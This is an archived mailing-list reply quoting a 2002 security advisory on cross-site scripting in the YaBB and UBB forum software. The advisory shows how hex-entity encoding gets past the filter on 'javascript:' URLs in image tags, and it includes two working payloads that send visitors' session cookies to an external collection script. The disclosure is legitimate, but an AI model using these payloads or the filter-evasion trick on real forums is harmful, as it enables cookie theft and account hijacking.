Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]

From: "Raymond Vrolijk" <raymond.vrolijk () veronica nl>
Date: Thu, 17 Jan 2002 12:25:36 +0100
Hi,

Now talking about UBB.. I found out that when I add an Insert Header meta
tag
in UBB's control panel, it is added twice....
How come?

Greetings from Holland,

Raymond Vrolijk
Programmer
http://www.veronica.nl

----- Original Message -----
From: "Obscure" <obscure () eyeonsecurity net>
To: <vulnwatch () vulnwatch org>
Sent: Wednesday, January 09, 2002 6:35 PM
Subject: [VulnWatch] CSS vulnerabilities in YaBB and UBB allow account
hijack [Multiple Vendor]



Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack
[Multiple Vendor]
Release Date: 08/01/2002

Application: YaBB and UBB


Platform: Any system supporting PERL.

Build -
YaBB : 1 Gold - Service Pack 1 - older versions were effected in the same
way.
UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release 1.0


Severity: Malicious users can steal session cookies, allowing

administrative

access to the bulletin board.

Author:
Obscure^
[ obscure () eyeonsecurity net ]

Vendor Status:
YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems

like

they knew about the issue).

Web:

http://yabb.xnull.com
http://www.infopop.com/products/ubb/
http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html


Background.

(extracted from
http://yabb.xnull.com)

YaBB is a leading provider of FREE, downloadable Perl forums for

webmasters,

with currently over 50,000 web communities using YaBB worldwide, and over

1

million registered users througout these forums! Join the messaging
revolution;
keep visitors coming back....

(extracted from
http://www.infopop.com/products/ubb/)
The Ultimate Bulletin Board (UBB)T is the most widely adopted Perl message
board on
the Web. With a solid five year development history, and worldwide
familiarity, it is easy to
use and maintain.

Problem.

When a user inserts [IMG]url[/IMG], YaBB changes that text to <img
src='url'>.
If someone inserts javascript:alert() instead of the url, the javascript
code
is executed by Internet Explorer or some other web browsers. This allows
stealing
 of cookie data and other interesting things. YaBB has filtered the
javascript
method, however it does not take into consideration that javascript: can

be

encoded using standard HTML hex and ASCII encoding. Same with UBB.
In UBB I need to encode several strings because they added checking for
certain
keywords such as cookie.
In my example I change javascript: to javascr&#x69;pt:


Exploit Example.

Inserting a new topic (or reply) with the following text will send

visitor's

cookies
to Eye on Security. The output is saved to
http://eyeonsecurity.net/tools/cookies.txt .
Cookies will contain the password in the case of UBB and a session cookie
(or encoded
password) in YaBB.

-- snap YaBB --

[img]javascr&#x69;pt:document.write
('&#x3cimg


src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu

ment.cookie)+'&#x3e')
[/img].

-- snap YaBB --

-- snap UBB --

[IMG]javascr&#x69;pt:document.wr&#x69;te
&#x28;'<img%20src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?

cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
[/IMG]

-- snap UBB --


Fix.

IMG tags should start with http, so that Javascript: and other goodies

(play

with mailto:)
are not allowed.


Note.

Other Bulletin Board Systems may also be vulnerable to these attacks.


Disclaimer.

The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.


Feedback.

Please send suggestions, updates, and comments to:

Eye on Security
mail : obscure () eyeonsecurity net
web : http://www.eyeonsecurity.net
Previous By Date Next
Previous By Thread Next

Current thread: